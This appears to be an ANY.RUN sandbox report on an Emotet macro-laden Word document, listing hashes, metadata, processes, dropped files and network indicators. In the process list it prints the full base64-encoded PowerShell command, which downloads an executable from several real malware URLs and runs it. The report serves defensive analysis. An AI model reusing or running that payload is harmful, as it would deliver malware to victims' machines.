analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

khtnAGvipOpDnzbCFMC

Full analysis: https://app.any.run/tasks/ae5ddf82-2749-4a9b-a13b-2b208dcbc922
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 13:40:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Practical Concrete Hat, Subject: Bypass, Author: Linwood Moen, Keywords: Organized, Comments: functionalities, Template: Normal.dotm, Last Saved By: Roberto Howe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

1BC2B40D2F750E5260E00DA0123E04B2

SHA1:

96EB8C71743FF71C21673E16A41F846B0D0793FA

SHA256:

8B5DB5A8FB38B8AE91A42EF038D1A9404DC3237C57CBF208EC17CB80B3440DCD

SSDEEP:

3072:veGRyYtKgdzSrGtKyIwLx3B7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:veGRyYtKUzSSnLx3XzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3080)

    • PowerShell script executed

      • powershell.exe (PID: 3080)

    • Creates files in the user directory

      • powershell.exe (PID: 3080)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3300)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3300)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Ortiz, Steuber and Mayer
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Roberto Howe
Template: Normal.dotm
Comments: functionalities
Keywords: Organized
Author: Linwood Moen
Subject: Bypass
Title: Practical Concrete Hat
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3300"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\khtnAGvipOpDnzbCFMC.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3080powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 371
Read events
886
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3300WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC37.tmp.cvr
MD5:
SHA256:
3080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMCM9BTHSCUMPDQVK87F.temp
MD5:
SHA256:
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E3A7175.wmfwmf
MD5:2344F33A41453E14A0410437115F9710
SHA256:CC735FAB5B9D09BCE7B5AF8BB2394145ED9882C2B7CE6909CB6E62D394F92549
3300WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$tnAGvipOpDnzbCFMC.docpgc
MD5:4471A1F7FDB5DA324A435B6167E0D5F4
SHA256:1CD33BEA3B0D14A26D932C24AF41331C13E063D9C0E029088BDBC49F8B7D4BC6
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CC7A18F.wmfwmf
MD5:9CA70E577CADBB131E20F402CF6143DA
SHA256:3A300BEAD2F06048BFB71656D68D69ACCC33496BD57EE0EC17CE81F61A3717E8
3300WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:7A64CED6C252CBDEF35EF95AD7774B51
SHA256:A345A0314254761D0A4F2FF83D644B3EECF807216850447E87ABA54385C9BAFA
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B77CC7.wmfwmf
MD5:68E547DE1484991AD9C38725B17C6100
SHA256:9CFBD40E2726029D4AE4DAA0C30F46EF604CE5B56E1AE195A0F2AB9F7C858C51
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA0C584B.wmfwmf
MD5:78968EB6613489B47B425C8EA66F27A8
SHA256:C29EEAF6B10A597DDC0C55E3E5DAB4F5F2925607292459751BCCCECF780F62D7
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F62A391.wmfwmf
MD5:8A0A74BAA2784DF0363371AD766712C4
SHA256:AA44AE7EE385869D3D69F51D38F56D1318B062B047556103F6C76ECAD179BCAA
3300WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE57145E.wmfwmf
MD5:3B0DE575A271B0FBA3002DAEB359C977
SHA256:0C31E2595DA0F562D4BE9EAD6A986FF8000BD57B729BE67A1DDF18D38DA9847E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3080
powershell.exe
GET
403
146.88.234.116:80
http://stephporn.com/cgi-bin/oSWSyiKNzf/
FR
html
318 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3080
powershell.exe
146.88.234.116:80
stephporn.com
PlanetHoster
FR
suspicious
3080
powershell.exe
43.255.154.26:443
thehopeherbal.com
GoDaddy.com, LLC
SG
suspicious
3080
powershell.exe
35.238.93.185:443
e-centricity.com
US
unknown

DNS requests

Domain
IP
Reputation
stephporn.com
  • 146.88.234.116
suspicious
thehopeherbal.com
  • 43.255.154.26
suspicious
e-centricity.com
  • 35.238.93.185
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
khtnAGvipOpDnzbCFMC